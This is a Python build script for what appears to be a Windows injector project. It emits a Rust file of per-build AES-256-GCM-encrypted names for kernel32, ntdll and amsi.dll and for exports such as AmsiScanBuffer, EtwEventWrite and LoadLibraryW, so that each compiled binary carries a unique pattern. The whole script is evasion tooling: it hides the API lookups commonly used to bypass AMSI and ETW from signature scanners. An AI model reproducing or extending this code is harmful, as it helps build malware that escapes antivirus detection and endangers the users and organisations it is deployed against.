#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Generates per-build stealth decryption tables.
Each build gets unique AES-256-GCM keys and unique encrypted byte arrays,
so no two binaries share the same pattern for DLL/export names.
"""

import os
from Crypto.Cipher import AES


def aes256gcm_encrypt(plaintext: bytes, key: bytes) -> tuple:
    nonce = os.urandom(12)
    cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
    ciphertext, tag = cipher.encrypt_and_digest(plaintext)
    return ciphertext + tag, nonce


def fmt_key(name: str, key: bytes) -> str:
    hex_vals = ', '.join(f'0x{b:02X}' for b in key)
    return f"    static {name}_KEY: [u8; 32] = [{hex_vals}];"


def fmt_nonce(name: str, nonce: bytes) -> str:
    hex_vals = ', '.join(f'0x{b:02X}' for b in nonce)
    return f"    static {name}_NONCE: [u8; 12] = [{hex_vals}];"


def fmt_ct(name: str, ct: bytes) -> str:
    hex_vals = ', '.join(f'0x{b:02X}' for b in ct)
    return f"    static {name}_CT: [u8; {len(ct)}] = [{hex_vals}];"


def generate_stealth_tables(output_path: str):
    """
    Generate stealth_tables.rs with:
    - Per-string AES-256-GCM keys and nonces (unique per build)
    - Encrypted DLL names: kernel32.dll, ntdll.dll, amsi.dll
    - Encrypted export names: SleepEx, EtwEventWrite, AmsiScanBuffer, AmsiInitSession, LoadLibraryW
    - Lazy-decrypt functions using AES-256-GCM
    """

    dll_names = [
        ("kernel32.dll", b"kernel32.dll"),
        ("ntdll.dll",    b"ntdll.dll"),
        ("amsi.dll",     b"amsi.dll"),
    ]
    export_names = [
        ("sleep_ex",          b"SleepEx"),
        ("etw_event_write",   b"EtwEventWrite"),
        ("amsi_scan_buffer",  b"AmsiScanBuffer"),
        ("amsi_init_session", b"AmsiInitSession"),
        ("load_library_w",    b"LoadLibraryW"),
    ]

    dll_entries   = []
    export_entries = []

    for name, data in dll_names:
        key   = os.urandom(32)
        ct, nonce = aes256gcm_encrypt(data, key)
        dll_entries.append((name, data, key, nonce, ct))

    for name, data in export_names:
        key   = os.urandom(32)
        ct, nonce = aes256gcm_encrypt(data, key)
        export_entries.append((name, data, key, nonce, ct))

    lines = []
    lines.append("// AUTO-GENERATED by stealth_gen.py — DO NOT EDIT")
    lines.append("// AES-256-GCM encrypted DLL/export names, unique per build")
    lines.append("")
    lines.append("use std::sync::OnceLock;")
    lines.append("")

    # AES helper function
    lines.append("fn _aes_dec_stealth(ct: &[u8], key: &[u8; 32], nonce: &[u8; 12]) -> Vec<u8> {")
    lines.append("    use aes_gcm::{aead::Aead, KeyInit, Aes256Gcm, Nonce};")
    lines.append("    let cipher = unsafe { Aes256Gcm::new_from_slice(key).unwrap_unchecked() };")
    lines.append("    cipher.decrypt(Nonce::from_slice(nonce), ct).unwrap_or_default()")
    lines.append("}")
    lines.append("")

    def emit_fn(fn_name, entries, prefix):
        lines.append(f"/// Decrypt name by ID (unique per build, AES-256-GCM)")
        lines.append(f"pub fn {fn_name}(id: u8) -> &'static str {{")
        for i, (name, data, key, nonce, ct) in enumerate(entries):
            sname = f"{prefix}_{i}"
            lines.append(f"    if id == {i} {{")
            lines.append(f"        static CELL: OnceLock<String> = OnceLock::new();")
            lines.append(f"        {fmt_key(sname, key)}")
            lines.append(f"        {fmt_nonce(sname, nonce)}")
            lines.append(f"        {fmt_ct(sname, ct)}")
            lines.append(f"        return CELL.get_or_init(|| String::from_utf8(_aes_dec_stealth(&{sname}_CT, &{sname}_KEY, &{sname}_NONCE)).unwrap_or_default());")
            lines.append(f"    }}")
        lines.append(f"    \"\"")
        lines.append(f"}}")
        lines.append("")

    emit_fn("stealth_dll_name",    dll_entries,    "DLL")
    emit_fn("stealth_export_name", export_entries, "EXP")

    with open(output_path, 'w', encoding='utf-8') as f:
        f.write('\n'.join(lines))

    dll_count = len(dll_entries)
    exp_count = len(export_entries)
    print(f"[+] Generated stealth_tables.rs ({os.path.getsize(output_path)} bytes, AES-256-GCM, {dll_count} DLLs, {exp_count} exports)")
    return 0


if __name__ == "__main__":
    out = os.path.join(os.path.dirname(__file__), "..", "src", "inject", "src", "stealth_tables.rs")
    generate_stealth_tables(out)
